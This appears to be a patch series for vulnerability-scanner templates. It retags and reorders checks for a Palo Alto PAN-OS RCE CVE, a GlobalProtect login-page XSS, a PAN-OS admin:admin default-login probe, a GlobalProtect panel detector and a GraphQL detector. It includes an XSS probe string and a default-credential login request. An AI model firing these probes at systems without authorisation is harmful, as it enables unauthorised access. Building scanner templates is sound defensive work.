100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -8,11 +8,11 @@ info: - https://www.exploit-db.com/exploits/43342 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html severity: critical - tags: cve,cve2017,rce,vpn,paloalto,globalprotect classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2017-15944 + tags: cve,cve2017,rce,vpn,panos,globalprotect requests: - raw: @@ -24,9 +24,9 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "@start@Success@end@" - part: body - type: status status: diff --git a/cves/2018/CVE-2018-10141.yaml b/cves/2018/CVE-2018-10141.yaml index fe677ff879..577e38e5cb 100644 --- a/cves/2018/CVE-2018-10141.yaml +++ b/cves/2018/CVE-2018-10141.yaml @@ -2,16 +2,16 @@ id: CVE-2018-10141 info: name: GlobalProtect Login page XSS + severity: medium author: dhiyaneshDk description: GlobalProtect Portal Login page in Palo Alto Networks PAN-OS before 8.1.4 allows an unauthenticated attacker to inject arbitrary JavaScript or HTML. - severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10141 - tags: globalprotect,xss,cve,cve2018,vpn classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2018-10141 cwe-id: CWE-79 + tags: cve,cve2018,panos,vpn,globalprotect,xss requests: - method: GET @@ -21,14 +21,14 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - 'var valueUser = "j";-alert(1)-"x";' - part: body - type: word + part: header words: - "text/html" - part: header - type: status status: diff --git a/default-logins/paloalto/panos-default-login.yaml b/default-logins/paloalto/panos-default-login.yaml index f7bac9f620..2e218f2bc2 100644 --- a/default-logins/paloalto/panos-default-login.yaml +++ b/default-logins/paloalto/panos-default-login.yaml @@ -6,7 +6,7 @@ info: severity: high description: Default Login of admin:admin on Palo Alto Networks PAN-OS application. reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. - tags: paloalto,panos,default-login + tags: panos,default-login requests: - raw: @@ -17,19 +17,19 @@ requests: user={{username}}&passwd={{password}}&challengePwd=&ok=Login + attack: pitchfork payloads: username: - admin password: - admin - attack: pitchfork matchers-condition: and matchers: - type: word + part: header words: - "Set-Cookie: PHPSESSID" - part: header - type: word words: diff --git a/exposed-panels/globalprotect-panel.yaml b/exposed-panels/globalprotect-panel.yaml index 6d6a03dfce..2f992eea88 100644 --- a/exposed-panels/globalprotect-panel.yaml +++ b/exposed-panels/globalprotect-panel.yaml @@ -4,7 +4,7 @@ info: name: PaloAlto Networks GlobalProtect Panel author: organiccrap severity: info - tags: panel + tags: panel,panos requests: - method: GET @@ -12,6 +12,7 @@ requests: - "{{BaseURL}}/global-protect/login.esp" - "{{BaseURL}}/sslmgr" + stop-at-first-match: true matchers: - type: word words: From 196470955845ac4f41ba62e55320dd2da0027ae4 Mon Sep 17 00:00:00 2001 From: Pradeepch99 Date: Fri, 12 Nov 2021 11:27:26 +0530 Subject: [PATCH 22/25] Update graphql-detect.yaml --- technologies/graphql-detect.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index 3c31133fed..ad4e2a97c4 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -145,6 +145,11 @@ requests: status: - 200 + - type: word + words: + - "Content-Type: application/json" + part: header + - type: regex regex: - "__schema" From 69a3ad0afb2125384350ed1ad64db8b5eac76d57 Mon Sep 17 00:00:00 2001 From: Pradeepch99 Date: Fri, 12 Nov 2021 11:39:28 +0530 Subject: [PATCH 24/25] Update graphql-detect.yaml --- technologies/graphql-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index ad4e2a97c4..b10a5913e2 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -149,7 +149,7 @@ requests: words: - "Content-Type: application/json" part: header - + - type: regex regex: - "__schema" From 7a30c6a982d46b75e4ec17ea8c223c033d1c600e Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 12 Nov 2021 12:55:49 +0530 Subject: [PATCH 25/25] Update graphql-detect.yaml --- technologies/graphql-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index b10a5913e2..f4c4be2de5 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -146,9 +146,9 @@ requests: - 200 - type: word - words: - - "Content-Type: application/json" part: header + words: + - "application/json" - type: regex regex: